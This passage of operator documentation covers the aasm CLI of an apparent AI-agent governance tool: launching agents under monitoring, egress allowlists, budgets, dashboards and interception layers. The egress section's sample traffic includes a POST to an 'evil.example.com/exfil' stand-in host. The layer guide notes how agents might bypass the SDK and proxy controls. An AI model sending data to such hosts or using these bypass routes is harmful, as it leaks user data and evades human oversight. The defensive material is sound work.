Trigger one manual retention pass (POST /api/v1/admin/retention-policy/run). Exits 0 on a successful pass, non-zero when the gateway is unreachable or returns a non-2xx status (the error chain is printed to stderr).

Flag	Type	Default	Description
`--dry-run`	flag	off	Log what would be retained/dropped without taking any action.

aasm admin run-retention --dry-run

{
  "dry_run": true,
  "audit_events_scanned": 14293,
  "audit_events_dropped": 0
}
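For operators who want to trigger the same endpoint from a script, the sketch below mirrors the documented exit-code behaviour: 0 on a 2xx response, non-zero when the gateway is unreachable or returns an error. The function name, the empty request body, and the 10-second timeout are assumptions; how --dry-run is conveyed to the endpoint is not documented here, so it is left out.

```python
import sys
import urllib.error
import urllib.request

RETENTION_PATH = "/api/v1/admin/retention-policy/run"


def run_retention(base_url: str, open_url=urllib.request.urlopen) -> int:
    """POST to the retention endpoint and return a process-style exit code."""
    request = urllib.request.Request(
        base_url.rstrip("/") + RETENTION_PATH,
        data=b"",               # assumption: no request body is required
        method="POST",
    )
    try:
        with open_url(request, timeout=10) as response:
            status = response.status
    except OSError as err:      # URLError and HTTPError are both OSError subclasses
        print(f"retention run failed: {err}", file=sys.stderr)
        return 1
    return 0 if 200 <= status < 300 else 1
```

The open_url parameter exists only so the function can be exercised without a running gateway.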

Last updated: 2026-06-11 by Chisanan232

aasm version

Show CLI and gateway version information. Prints the aasm CLI version, then probes the gateway health endpoint (GET /api/v1/health) for the gateway and API versions. When the gateway is unreachable, the gateway/api rows show an unreachable marker.

Synopsis

aasm version

This command has no subcommands or flags of its own. It honors the global --output and the resolved API context (--api-url / --context).

aasm -V / aasm --version prints only the CLI version (the standard clap flag). aasm version additionally reports the gateway and API versions.

Example

aasm version

COMPONENT   VERSION
cli         0.0.1
gateway     0.0.1
api         0.0.1

JSON form:

aasm version --output json

Last updated: 2026-06-11 by Chisanan232

aasm completion

Generate a shell completion script for aasm and write it to stdout. Source or install the output to get tab-completion for commands, subcommands, and flags.

Synopsis

aasm completion <SHELL>

This command has no subcommands.

Arguments

Argument	Type	Description
`<SHELL>`	shell	Shell to generate completions for. Supported values come from `clap_complete::Shell`: `bash`, `elvish`, `fish`, `powershell`, `zsh`.

Examples

Bash (current session):

source <(aasm completion bash)

Zsh (install into a completions directory on $fpath):

aasm completion zsh > ~/.zfunc/_aasm

Fish:

aasm completion fish > ~/.config/fish/completions/aasm.fish

Last updated: 2026-06-11 by Chisanan232

Usage Guide

This guide walks through the real, day-to-day tasks an operator performs with Agent Assembly, using the aasm CLI, the governance gateway, the three interception layers, and the dashboard. Every command and every screenshot on these pages was produced against the actual 0.0.1-alpha.5 build. Where a scenario needs a platform Agent Assembly does not target locally (for example the Linux-only eBPF layer, or the SaaS control-plane API the web dashboard talks to), the page says so explicitly rather than showing a mock-up.

What you can do

Scenario	Goal	Page
Govern an agent	Launch a real AI dev tool under governance, end to end	Govern an agent end-to-end
Egress control	Restrict which hosts an agent may reach, and dry-run it before applying	Enforce an egress policy
Cost control	Set per-team spend caps and watch spend accumulate	Team budgets and cost
Observe	Watch the fleet in the web dashboard and the terminal TUI	Observe in the dashboard
Architecture in practice	Choose and combine the SDK, proxy, and eBPF layers	Choosing interception layers
When things break	Diagnose the most common local failures	Troubleshooting

The shape of every scenario

Agent Assembly governance always has the same three moving parts:

A gateway — the brain. It holds the agent registry, evaluates policy, tracks budgets, and writes the audit log. You start it once.
At least one interception layer — the SDK shim, the aa-proxy sidecar, or the eBPF kernel hooks — that observes what an agent does and asks the gateway for an allow/deny decision.
A policy — a YAML document describing what is allowed: capabilities, network egress, per-tool rules, budgets, and approval gates.

The operator surface for all of this is the aasm binary:

aasm — command-line tool for Agent Assembly

Commands:
  admin       Gateway administrative operations
  agent       Manage monitored agent processes
  alerts      Manage governance alerts
  audit       Query audit log entries and export compliance reports
  logs        Query and stream audit log events
  policy      Manage governance policies
  context     Manage named API contexts (connection profiles)
  config      Validate an `agent-assembly.toml` runtime configuration file
  completion  Generate shell completion scripts
  status      Show fleet health, agents, approvals, and budget at a glance
  version     Show CLI and gateway version information
  trace       Visualize a session trace (tree or timeline)
  approvals   Manage human-in-the-loop approval requests
  cost        Query cost summary and forecast spending
  dashboard   Open an interactive TUI dashboard for real-time governance monitoring
  gateway     Manage the aa-gateway governance daemon
  run         Launch an AI dev tool (claude, codex, copilot, windsurf) with governance wiring
  sandbox     Run a WebAssembly tool inside the Agent Assembly sandbox
  tools       List and manage AI dev tools on this system
  topology    Visualize agent topology, trees, lineage, and statistics
  proxy       Manage the aa-proxy sidecar — lifecycle, CA trust, and log tailing
  start       Start the locally-managed Agent Assembly gateway process
  stop        Stop the locally-managed Agent Assembly gateway process

Two global flags appear in nearly every example below:

--api-url <URL> — where the CLI sends its requests. Defaults to the SaaS control-plane API on http://localhost:8080. When you run the local gateway (aasm start / aa-gateway --mode local) it serves its HTTP API on http://127.0.0.1:7391, so the local-mode examples pass --api-url http://127.0.0.1:7391.
--output <table|json|yaml> — table for humans, json/yaml for scripting.

A note on ports. The gRPC policy server listens on 127.0.0.1:50051 (where SDKs and the proxy connect). The local control-plane HTTP API and the embedded dashboard are served on 127.0.0.1:7391. The full web dashboard’s data API (/api/v1/fleet, /api/v1/policies, …) is provided by the SaaS/cloud control plane on port 8080, which is not part of the open-source local runtime — see Observe in the dashboard for what renders locally and what needs the hosted backend.

Last updated: 2026-06-11 by Bryant

Govern an agent end-to-end

Goal. Take a real AI dev tool on your machine — Claude Code, Codex, Copilot, or Windsurf — and launch it so that everything it does runs through Agent Assembly governance: it is registered with the gateway, tagged to a team and trace, and routed through the proxy so its tool-calls and network requests are policy-checked and audited.

Prerequisites

The aasm binary built (cargo build -p aa-cli; the binary is at ./target/debug/aasm).
The gateway binary on PATH for the aasm start helper (cargo build -p aa-gateway --bin aa-gateway).
At least one supported AI dev tool installed.

Step 1 — See which tools Agent Assembly can govern

aasm discovers the AI dev tools already installed on the system and reports the governance level it can apply to each. This is a real probe of the machine, not a static list:

$ aasm tools list
+---------------+-----------------------+---------------------------------------------------------+------------------+
| TOOL          | VERSION               | PATH                                                    | GOVERNANCE LEVEL |
+====================================================================================================================+
| ClaudeCode    | 2.1.172 (Claude Code) | /opt/homebrew/bin/claude                                | L3Native         |
|---------------+-----------------------+---------------------------------------------------------+------------------|
| Codex         | codex-cli 0.135.0     | /opt/homebrew/bin/codex                                 | L2Enforce        |
|---------------+-----------------------+---------------------------------------------------------+------------------|
| GitHubCopilot | 1.388.0               | /Users/you/.vscode/extensions/github.copilot-1.388.0    | L1Observe        |
+---------------+-----------------------+---------------------------------------------------------+------------------+

The governance level reflects how deeply Agent Assembly can integrate with that tool — from L3Native (the tool exposes a hook the runtime wires into directly) down to L1Observe (the runtime can observe but not natively intercept, so the proxy and eBPF layers do the enforcing).

Step 2 — Start the gateway

The gateway is the decision engine every governed action is checked against. For a local, in-process control plane:

$ aasm start --mode local --port 7391

This serves the HTTP control-plane API and the dashboard on http://127.0.0.1:7391 with a local SQLite store. You can confirm it is up:

$ aasm --api-url http://127.0.0.1:7391 status
Agent Assembly Status
─────────────────────────────────────
  Mode:      local
  Gateway:   http://127.0.0.1:7391
  Storage:   sqlite
  Version:   0.0.1-alpha.5
  Uptime:    2m 24s
  Health:    ✓ ok
─────────────────────────────────────

STORAGE
───────
  Backend:     sqlite
  Path:        /Users/you/.aasm/local.db
  DB Health:   ✓ ok  (0ms)
  Rows:        audit_events: 0 hot
               agents: 0  |  policies: 0

The fleet starts empty (agents: 0) — nothing is governed until you launch a tool under aasm run in the next step.

Step 3 — Launch the tool under governance

aasm run <tool> is the heart of this scenario. It assigns the session an agent identity, a team, and a trace id for lineage tracking, wires in the proxy, and then execs the real tool. Before running it for real, use --dry-run to see exactly what governance wiring will be applied — nothing is launched:

$ aasm run claude --team-id research --agent-id research-bot-01 --dry-run
--- aasm run dry-run ---
agent_id:    research-bot-01
trace_id:    dry-run-daa9d73a-f2fc-4977-9d00-50f4c4025fa9
session_id:  dry-run-0d7a0c16-25b2-456b-84e8-b7907fa963d1

--- managed settings ---
<dry-run: managed settings not generated>

--- launch command ---
claude

--- environment ---
AA_AGENT_ID=research-bot-01
AA_REGISTRATION_ID=dry-run-2b00ef56-3f35-4ef9-8164-ea899dfe90aa
AA_SESSION_ID=dry-run-0d7a0c16-25b2-456b-84e8-b7907fa963d1
AA_TEAM_ID=research
AA_TRACE_ID=dry-run-daa9d73a-f2fc-4977-9d00-50f4c4025fa9
AI_AGENT=claude-code_2-1-165_agent
CLAUDECODE=1
CLICKUP_API_TOKEN=***MASKED***
GITHUB_TOKEN=***MASKED***
JIRA_API_TOKEN=***MASKED***
SLACK_BOT_TOKEN=***MASKED***
...

Notice two things that are doing real work:

The AA_* environment variables (AA_AGENT_ID, AA_TEAM_ID, AA_TRACE_ID, AA_REGISTRATION_ID, AA_SESSION_ID) are injected so the launched tool’s events carry identity and lineage back to the gateway.
Secret-looking environment variables in your shell — API tokens, PATs — are masked (***MASKED***) in the launch environment that gets logged, so credentials never leak into the audit trail.
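The masking behaviour in the second point can be pictured with a name-based filter. The pattern below is purely an assumption chosen to cover the variables in the sample output; the heuristic aasm actually uses to decide what looks like a secret is not documented on this page.

```python
import re
from typing import Dict

MASK = "***MASKED***"

# Hypothetical heuristic: variable names containing these words are treated as secrets.
_SECRET_NAME = re.compile(r"TOKEN|SECRET|PASSWORD|API_KEY", re.IGNORECASE)


def mask_env(env: Dict[str, str]) -> Dict[str, str]:
    """Return a copy of env that is safe to log: secret-looking values are replaced."""
    return {
        name: (MASK if _SECRET_NAME.search(name) else value)
        for name, value in env.items()
    }
```

Only the logged copy is masked in this sketch; the original mapping is left untouched so the launched process would still receive the real values.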

When you drop --dry-run, the same wiring is applied for real and the tool starts. Useful flags:

Flag	Effect
`--team-id <id>`	Tag the session to a team (drives team budgets and topology).
`--governance-level <level>`	Override the level Agent Assembly applies.
`--enforcement-mode observe` (or `--observe`)	Compute and audit policy decisions but never block — a shadow run.
`--enforcement-mode enforce`	Default — deny blocks, redact strips.
`--no-proxy`	Skip proxy injection (not recommended for governed environments).
`--root-agent <id>`	Record a parent for multi-agent lineage.

The --enforcement-mode distinction matters when rolling governance out: start with --observe to see what would be blocked without breaking the agent, then switch to enforce once the policy is right.
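The difference between the two modes comes down to whether a deny decision is acted on. A minimal sketch of that rule, with function names invented for illustration:

```python
from collections import Counter
from typing import Iterable


def is_blocked(decision: str, mode: str) -> bool:
    """A deny only blocks in enforce mode; observe mode records it and lets it through."""
    if mode not in ("observe", "enforce"):
        raise ValueError(f"unknown enforcement mode: {mode}")
    return mode == "enforce" and decision == "deny"


def would_block(decisions: Iterable[str]) -> int:
    """Count how many actions from a shadow run would be blocked under enforce."""
    return Counter(decisions)["deny"]
```

Running a session in observe mode and checking would_block against its recorded decisions is one way to estimate the impact of switching to enforce.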

Step 4 — Observe the governed agent

Once the tool is running under aasm run, the registered agent appears in the fleet and its actions flow into the audit log. You inspect it with:

$ aasm agent list                 # all registered agents
$ aasm agent inspect <agent-id>   # one agent in detail
$ aasm topology team research     # the whole team
$ aasm status                     # fleet health at a glance

and watch its decisions live via the dashboard — see Observe in the dashboard.

Result

You now have a real AI tool running with a stable governed identity, every tool-call and outbound request routed through the gateway for an allow/deny decision, secrets scrubbed from the recorded environment, and a complete audit trail keyed to the agent, team, and trace you assigned in Step 3.

Last updated: 2026-06-11 by Bryant

Enforce an egress policy

Goal. Restrict the hosts an agent is allowed to reach, so a prompt-injected or confused agent cannot exfiltrate data to an arbitrary endpoint. You author a network allowlist, dry-run it against recorded traffic before applying it, and then enforce it at the proxy layer.

How egress enforcement works

Network egress is the job of the sidecar proxy (aa-proxy), the second of the three interception layers. It terminates outbound HTTPS with a per-host CA (MitM) and, for every CONNECT, asks: is this host on the policy’s allowlist? Hosts that fail the check are refused before any bytes leave the machine — no code change in the agent required.

The allowlist lives in the network section of a policy:

apiVersion: agent-assembly/v1
kind: Policy
metadata:
  name: egress-allowlist
  version: "1.0.0"
spec:
  network:
    allowlist:
      - api.openai.com
      - "*.githubusercontent.com"

Allowlist matching semantics

The proxy matches each requested host against every allowlist entry using these rules (from aa_core::policy::is_host_allowed_by_egress_allowlist):

Pattern	Matches	Does not match
`api.openai.com`	`api.openai.com` (case-insensitive, exact)	`evil.api.openai.com`
`*.githubusercontent.com`	`raw.githubusercontent.com`, `objects.githubusercontent.com`	bare `githubusercontent.com`
`*`	every host	—
(empty allowlist)	every host (no restriction)	—

The leftmost-label wildcard (*.example.com) requires at least one extra label to the left and anchors on the right, so it cannot be fooled by an attacker-crafted host like example.com.evil.net.
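The rules in the table can be sketched in a few lines. This is an illustrative reimplementation, not the code of aa_core::policy::is_host_allowed_by_egress_allowlist; in particular, treating wildcard patterns as case-insensitive is an assumption carried over from the exact-match row.

```python
from typing import Sequence


def host_allowed(host: str, allowlist: Sequence[str]) -> bool:
    """Check a host against an egress allowlist using the documented matching rules."""
    if not allowlist:
        return True                           # empty allowlist: no restriction
    host = host.lower()
    for pattern in allowlist:
        pattern = pattern.lower()
        if pattern == "*" or pattern == host:
            return True                       # match-all, or exact match
        if pattern.startswith("*."):
            suffix = pattern[1:]              # e.g. ".githubusercontent.com"
            # Anchored on the right, with at least one extra label on the left.
            if host.endswith(suffix) and len(host) > len(suffix):
                return True
    return False
```

Because the suffix keeps its leading dot, a host such as example.com.evil.net never matches *.example.com, and the bare domain does not match its own wildcard.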

Step 1 — Validate the policy locally

Validation parses and type-checks the YAML without contacting a gateway, and warns about unrecognised keys so you catch typos early:

$ aasm policy validate egress-policy.yaml
Policy is valid: egress-policy.yaml

Step 2 — Dry-run against recorded traffic

aasm policy simulate replays an audit-log JSONL file through the policy engine and reports what each event would have decided — without enforcing anything. This is how you prove a new allowlist before it can break production traffic.

A replay file is one JSON object per line; each line is an audit event whose payload is the serialized governance action. For egress, the action is a NetworkRequest:

{"event_type":"ToolCallIntercepted","agent_id":"researcher-1","payload":"{\"NetworkRequest\":{\"url\":\"https://api.openai.com/v1/chat/completions\",\"method\":\"POST\"}}"}
{"event_type":"ToolCallIntercepted","agent_id":"researcher-1","payload":"{\"NetworkRequest\":{\"url\":\"https://evil.example.com/exfil\",\"method\":\"POST\"}}"}
{"event_type":"ToolCallIntercepted","agent_id":"researcher-1","payload":"{\"NetworkRequest\":{\"url\":\"https://raw.githubusercontent.com/org/repo/main/README.md\",\"method\":\"GET\"}}"}

Run the simulation:

$ aasm policy simulate --policy egress-policy.yaml --against traffic.jsonl
Simulation Report
--------------------------------------------------
Total events:       3
Allowed:            1
Denied:             2
Approval required:  0

EVENT#   ACTION               DECISION     REASON
----------------------------------------------------------------------
1        net:POST:https://evil.example.com/exfil deny         host not in network allowlist
2        net:GET:https://raw.githubusercontent.com/org/repo/main/README.md deny         host not in network allowlist

The report lists only the flagged (non-allow) outcomes, and event numbers are zero-based. The api.openai.com request (event 0) was allowed, so it does not appear in the flagged list; the exfiltration attempt to evil.example.com (event 1) was denied, as expected.

Honest caveat — two matchers, one allowlist. The raw.githubusercontent.com request was denied by the simulator above even though *.githubusercontent.com is on the allowlist. That is because the policy simulate decision path matches the host with an exact string comparison, whereas the live aa-proxy CONNECT path uses the glob-aware matcher described in the table above (which would allow it). When validating wildcard egress rules, confirm the live proxy behaviour as well as the simulation; treat a simulation deny on a wildcard host as “verify against the proxy”, not necessarily a real block.

For scripting and CI gating, write the structured report to a file and key off the exit status:

$ aasm policy simulate --policy egress-policy.yaml --against traffic.jsonl \
    --output-file report.json
$ cat report.json
{
  "total_events": 3,
  "denied": 2,
  "allowed": 1,
  "approval_required": 0,
  "budget_impact_usd": null,
  "flagged_outcomes": [
    { "event_index": 1, "action": "net:POST:https://evil.example.com/exfil",
      "decision": "deny", "reason": "host not in network allowlist" },
    { "event_index": 2, "action": "net:GET:https://raw.githubusercontent.com/org/repo/main/README.md",
      "decision": "deny", "reason": "host not in network allowlist" }
  ]
}
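A CI job can triage the structured report so that wildcard-covered denies are flagged for proxy verification instead of failing the build outright. The sketch below assumes the report shape shown above and an allowlist you pass in yourself; the function name `triage` and the `net:<METHOD>:<URL>` parsing are inferred from the sample, not taken from the CLI's documented contract.

```python
from typing import Dict, List, Tuple
from urllib.parse import urlparse


def triage(report: Dict, allowlist: List[str]) -> Tuple[List[Dict], List[Dict]]:
    """Split flagged denies into (confirmed, verify_against_proxy)."""
    suffixes = [p[1:].lower() for p in allowlist if p.startswith("*.")]
    confirmed: List[Dict] = []
    verify: List[Dict] = []
    for outcome in report.get("flagged_outcomes", []):
        if outcome.get("decision") != "deny":
            continue
        # Sample actions look like "net:<METHOD>:<URL>".
        parts = outcome.get("action", "").split(":", 2)
        host = (urlparse(parts[2]).hostname or "") if len(parts) == 3 else ""
        # A deny on a host that a wildcard entry would cover may be an
        # artifact of the simulator's exact-match comparison.
        covered = any(host.endswith(s) and len(host) > len(s) for s in suffixes)
        (verify if covered else confirmed).append(outcome)
    return confirmed, verify
```

A gate script could load `report.json` with `json.load`, fail the job when `confirmed` is non-empty, and print `verify` as a reminder to check those hosts against the running proxy.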

You can also dry-run against live traffic for a fixed window instead of a file:

$ aasm policy simulate --policy egress-policy.yaml --live --duration 60s

Step 3 — Enforce at the proxy

Bring up the sidecar and trust its CA so TLS interception works:

$ aasm proxy install-ca          # add the per-host CA to the OS trust store
$ aasm proxy start               # listens on 127.0.0.1:8899 by default
$ aasm proxy status

aasm proxy start accepts --listen <addr> (default 127.0.0.1:8899), --gateway <url> to point it at the gateway that owns the policy, and --ca-dir <dir> for CA storage. Agents launched via aasm run have the proxy injected automatically (Step 3 of Govern an agent end-to-end); for other processes, route their HTTPS through the proxy address.

When the policy is applied, the proxy refuses any CONNECT to a host outside the allowlist and the refusal is written to the audit log.
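For a process not launched through aasm run, one common way to route HTTPS through the sidecar is the conventional proxy environment variables, which many HTTP clients honor. This sketch assumes the default listen address and that the client reads `HTTPS_PROXY`; the helper name `proxied_env` is hypothetical, and the client must still trust the proxy CA.

```python
import os
from typing import Dict, Optional


def proxied_env(proxy_addr: str = "127.0.0.1:8899",
                base: Optional[Dict[str, str]] = None) -> Dict[str, str]:
    """Return a copy of the environment that points HTTPS at the proxy."""
    env = dict(os.environ if base is None else base)
    proxy_url = f"http://{proxy_addr}"  # CONNECT proxies are addressed over http://
    # Set both spellings because tools differ on which one they read.
    env["HTTPS_PROXY"] = proxy_url
    env["https_proxy"] = proxy_url
    return env
```

The result can be passed as the `env` argument of `subprocess.run` when launching the ungoverned tool, leaving the parent process's own environment untouched.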

Result

Outbound traffic is now constrained to an explicit allowlist, verified with a dry-run before it could affect a running agent, and enforced at the network layer without modifying the agent’s code.

Last updated: 2026-06-11 by Bryant

Team budgets and cost

Goal. Put a hard spend cap on what an agent (and a team) can burn on model calls, so a runaway planning loop cannot run up an unbounded bill — and watch spend accumulate against that cap.

How budgets work

The gateway tracks per-agent and per-team spend and evaluates it on every governed model call. Budgets are declared in the budget section of a policy. These are the real fields the gateway parses:

apiVersion: agent-assembly/v1
kind: Policy
metadata:
  name: research-budget
  version: "1.0.0"
spec:
  budget:
    daily_limit_usd: 25.0          # per-agent cap, resets each day
    monthly_limit_usd: 400.0       # per-agent cap, resets each month
    org_daily_limit_usd: 100.0     # organisation-wide daily cap
    org_monthly_limit_usd: 2000.0  # organisation-wide monthly cap
    timezone: "Asia/Taipei"        # IANA tz for the reset boundary (default UTC)
    action_on_exceed: deny         # "deny" (default) or "suspend"
    window: "1h"                   # optional sub-day rollover window (humantime)

Field	Meaning
`daily_limit_usd` / `monthly_limit_usd`	Per-agent spend caps. Omit for no limit.
`org_daily_limit_usd` / `org_monthly_limit_usd`	Organisation-wide caps, enforced independently of the per-agent caps.
`timezone`	IANA timezone that defines the daily/monthly reset boundary. Defaults to UTC.
`action_on_exceed`	What happens when the cap is hit: `deny` blocks further spend (default), `suspend` suspends the agent.
`window`	Optional sub-day rollover (e.g. `"5s"`, `"30m"`, `"1h30m"`). When absent, spend rolls over at the calendar-day boundary.
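The effect of `timezone` on the reset boundary is easiest to see with a worked example. The sketch below computes the next calendar-day rollover for a given zone; it is an illustration of the concept rather than the gateway's code, and it uses a fixed UTC+8 offset as a stand-in for Asia/Taipei (which observes no daylight saving) so that it runs without a tz database.

```python
from datetime import datetime, timedelta, timezone, tzinfo


def next_daily_reset(now: datetime, tz: tzinfo) -> datetime:
    """Return the next local midnight in tz, expressed in UTC."""
    local = now.astimezone(tz)
    next_midnight = (local + timedelta(days=1)).replace(
        hour=0, minute=0, second=0, microsecond=0
    )
    return next_midnight.astimezone(timezone.utc)


# Stand-in for zoneinfo.ZoneInfo("Asia/Taipei"), which needs tz data installed.
TAIPEI = timezone(timedelta(hours=8))

now = datetime(2026, 6, 11, 15, 30, tzinfo=timezone.utc)
reset_taipei = next_daily_reset(now, TAIPEI)     # 2026-06-11 16:00 UTC
reset_utc = next_daily_reset(now, timezone.utc)  # 2026-06-12 00:00 UTC
```

At 15:30 UTC it is 23:30 in Taipei, so a Taipei-anchored daily cap rolls over 30 minutes later, while a UTC-anchored cap would not roll over for another eight and a half hours.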

Step 1 — Validate and apply the budget policy

$ aasm policy validate research-budget.yaml
Policy is valid: research-budget.yaml

$ aasm policy apply research-budget.yaml --applied-by alice@example.com

policy apply saves the policy to version history (see aasm policy history / aasm policy rollback), so a budget change is auditable and reversible.

Step 2 — Watch spend against the cap

aasm cost summary reports spend for the current period. By default it shows today; pass --period month for the month, and --group-by agent to break it down per agent:

$ aasm cost summary --period today
$ aasm cost summary --period month --group-by agent

Each command takes --output json|yaml for scripting.

To see where spend is heading, aasm cost forecast projects the month from the current daily rate:

$ aasm cost forecast
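Projecting the month from the current daily rate amounts to a linear extrapolation. The sketch below shows one plausible form of that arithmetic; the exact formula aasm cost forecast uses is not documented here, so treat the function and its day-counting convention as assumptions.

```python
import calendar
from datetime import date


def forecast_month_usd(spent_so_far_usd: float, today: date) -> float:
    """Linear projection: average daily spend so far times days in the month."""
    days_in_month = calendar.monthrange(today.year, today.month)[1]
    daily_rate = spent_so_far_usd / today.day  # days elapsed, counting today
    return daily_rate * days_in_month


projected = forecast_month_usd(110.0, date(2026, 6, 11))  # 10.0/day over 30 days
```

With $110 spent by 11 June, the projection is $300 for the month, which sits under the 400.0 monthly cap in the example policy.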

The fleet-level aasm status view also surfaces a budget block at a glance:

BUDGET STATUS
─────────────
  Daily spend : $-- (no limit set)
  Date:           --
  (no per-agent data)

(The example above is from a fresh gateway with no budget applied and no spend yet — once a budget policy is applied and agents start spending, the daily spend and per-agent rows populate.)

Step 3 — See budgets in topology

aasm topology team <team-id> lists every agent in a team; add --show-budget to include each agent’s governance/budget posture in the tree:

$ aasm topology team research --show-budget

What happens at the cap

When an agent reaches a per-agent cap (daily_limit_usd or monthly_limit_usd) or an organisation-wide cap, the gateway applies action_on_exceed:

deny — the offending model call is denied and audited. The agent keeps running but cannot spend until the window resets.
suspend — the agent is suspended (you can later aasm agent resume <id>).

Either way the decision lands in the audit log, so cost overruns are accountable after the fact, not just blocked in the moment.
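The cap check can be pictured as a small decision function. This is a sketch under stated assumptions, not the gateway's budget tracker: it covers only the daily fields, and it assumes the call that would push spend past a cap is the one refused. The names `Budget` and `decide` are hypothetical.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class Budget:
    daily_limit_usd: Optional[float] = None      # None means no per-agent limit
    org_daily_limit_usd: Optional[float] = None  # None means no org limit
    action_on_exceed: str = "deny"               # "deny" or "suspend"


def decide(budget: Budget, agent_spent_usd: float, org_spent_usd: float,
           call_cost_usd: float) -> str:
    """Return "allow", "deny", or "suspend" for one model call."""
    def over(limit: Optional[float], spent: float) -> bool:
        return limit is not None and spent + call_cost_usd > limit

    # The per-agent and org caps are checked independently; either can trip.
    if over(budget.daily_limit_usd, agent_spent_usd) or \
            over(budget.org_daily_limit_usd, org_spent_usd):
        return budget.action_on_exceed
    return "allow"
```

Keeping the two caps independent means a single agent well under its own limit can still be refused once the organisation as a whole is at its ceiling.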

Result

The team now has enforceable per-agent and organisation-wide spend caps with a defined reset boundary and a clear over-budget action, plus CLI views to track actual spend and forecast the month.

Last updated: 2026-06-11 by Bryant

Observe in the dashboard

Goal. Watch the governed fleet in real time. Agent Assembly ships two observation surfaces from the same aasm binary: a web dashboard (a Vite/React SPA) and an in-terminal TUI. This page shows what each looks like and how to bring it up.

The web dashboard

The dashboard is a single-page React app. In production it is embedded into the gateway and served at /; for UI development it runs under Vite on port 3000 and proxies /api to the control-plane API on port 8080.

Bring it up locally

The local-mode gateway serves the compiled SPA on its HTTP port (7391 by default). Build the dashboard bundle once, then start the gateway pointed at it:

$ cd dashboard && pnpm install && pnpm build      # produces dashboard/dist/
$ cd .. && aasm start --mode local --port 7391
# the dashboard is now at http://127.0.0.1:7391/

The dashboard authenticates with an API key. This screen renders entirely client-side, so it is the same whether or not a backend is reachable:

Dashboard login — API key entry

After authenticating, the canonical 12-route navigation appears, grouped into Monitor (Overview, Fleet, Topology, Live Ops, Alerts, Audit Log), Control (Capability, Policy, Secret Scrubbing), and Manage (Cost & Budget, Agent Groups, Members & Access). The header carries the approvals indicator, a light/dark theme toggle, Settings, and Log out:

Dashboard app shell — Overview route with the full governance navigation

An implemented page — Policies

The Policies page is the visual policy builder. It shows All / Active / Proposed tabs and a + new policy action; opening a row drops into the editor:

Dashboard Policies page — visual builder with All / Active / Proposed tabs

More implemented routes — Live Ops and Topology

The Live Operations route renders the real-time governance layout: the L1→L2→L3 traffic pipeline (Identity → Capability → Scrub → External), a tail -f event stream with agent/team/op-type/status filters and an auto-scroll toggle, and the approval queue. Against the local-mode gateway the event stream shows “reconnecting…” (no backend feed) and the columns are empty, but the full operator layout is real:

Dashboard Live Operations — traffic pipeline, event stream, and approval queue

The Topology route lists agents and teams; here it honestly reports 0 agents · 0 teams because the fleet data API is not part of the local runtime:

Dashboard Topology — agent/team map, empty in local mode

Light and dark themes

The header theme toggle flips the entire token-driven UI between light and dark. Here is the Overview route in dark mode:

Dashboard in dark mode — Overview route with the dark theme applied

Honest caveat — what renders locally vs. what needs the hosted backend. The screenshots above are all real captures of the 0.0.1-alpha.5 SPA served by the local-mode gateway. The data panels are empty (zero policies, zero agents, “not implemented yet” on some routes) because the dashboard’s data API — /api/v1/fleet, /api/v1/policies, /api/v1/capability/matrix, and the auth-token endpoint — is provided by the SaaS/cloud control plane on port 8080, which is not part of the open-source local runtime. The local-mode gateway on 7391 serves the SPA and a small set of endpoints (/healthz, /api/v1/admin/status), so the chrome, navigation, theming, and page shells are fully real while the populated tables require the hosted backend. Routes still marked “not implemented yet” (e.g. Overview) render a ComingSoon placeholder by design in this build.

The terminal TUI

For operators who live in a terminal, aasm dashboard (no subcommand) launches an interactive full-screen TUI built on ratatui, with a live feed and keyboard-driven approval handling:

$ aasm dashboard
# ...full-screen TUI; press 'q' to quit

$ aasm dashboard --help
Open an interactive TUI dashboard for real-time governance monitoring

Usage: aasm dashboard [OPTIONS] [COMMAND]

Commands:
  start  Serve the embedded SPA at http://127.0.0.1:<port>. Blocks until Ctrl-C
  open   Open the browser to an already-running dashboard
  stop   Stop a dashboard server started with `aasm dashboard start`

The TUI polls the control-plane REST API and subscribes to a WebSocket feed for live events; selecting a pending approval lets you approve or reject it inline (y / n).

Honest caveat — no live TUI screenshot here. The TUI requires an interactive terminal (it switches to the alternate screen and raw mode) and a reachable events/approvals API (port 8080) to display populated panels. Driven headlessly against the empty local backend it renders the frame but with no data to show, so a meaningful still capture is not reproducible in this environment — the launch command and --help above are real, and the panels populate once the hosted control plane (or a backend with live agents) is connected.

Serving the SPA without a browser launch helper

aasm dashboard start serves the embedded SPA directly and blocks until Ctrl-C; aasm dashboard open opens your browser to an already-running server, and aasm dashboard stop stops a server started with start. Pass --port (or set AASM_DASHBOARD_PORT) to choose the port, and --open to launch the browser once it is ready.

Result

You can observe the fleet either in the browser (rich, point-and-click) or in the terminal (fast, keyboard-driven), both from the same binary and both backed by the same gateway.

Last updated: 2026-06-12 by Chisanan232

Choosing interception layers

Goal. Decide which of the three interception layers to deploy, and how to combine them, for a given governance requirement. Agent Assembly enforces policy through three independently-deployable layers; this page is about the practical trade-offs, with the real commands for each.

The three layers at a glance

Listed from lowest latency cost (layer 1) to highest detection authority (layer 3):

Layer	What it is	Catches	Cost / requirement
1. SDK (in-process)	A thin Rust shim (`aa-ffi-*` over `aa-sdk-client`) the language SDKs call. Emits events to the gateway and applies pre-execution allow/deny via wrapper functions.	Anything the instrumented code path does.	Lowest latency, but requires the agent to adopt the SDK.
2. Proxy sidecar (`aa-proxy`)	Intercepts outbound HTTPS via MitM with a per-host CA. Enforces network-egress policy with no code change.	Anything the SDK misses that goes over the network.	No code change; requires trusting the proxy CA.
3. eBPF (`aa-ebpf`)	Kernel hooks: uprobes on SSL libraries, kprobes/tracepoints on `exec`/file syscalls.	Everything else, including deliberate bypass attempts.	Highest authority; Linux-only.

The gateway is the common brain for all three — every layer asks the same policy engine for its decision and writes to the same audit log.

When to use each

Reach for the SDK layer when you control the agent’s code and want the lowest-overhead, most precise instrumentation — it sees tool-call arguments and results directly, in process.
Add the proxy when you cannot or do not want to modify the agent, and the risk you care about is network egress / data exfiltration. It is the most practical way to govern a third-party or closed-source tool. See Enforce an egress policy.
Add eBPF when you need defense-in-depth that an agent cannot bypass — e.g. it shells out, writes files, or makes raw connections that skip both the SDK and the proxy. This is the catch-all backstop.

Combining layers

The layers are additive, not exclusive. A typical governed deployment runs the SDK and the proxy: the SDK gives rich, in-process tool-call governance, while the proxy backstops the network path for anything the SDK does not see. On Linux, eBPF sits underneath both as the bypass-proof floor.

aasm run reflects this in its governance level (see Govern an agent end-to-end): a tool reported as L3Native integrates at the SDK depth, while an L1Observe tool relies on the proxy and eBPF layers to do the actual enforcing.

Layer 2 in practice — the proxy

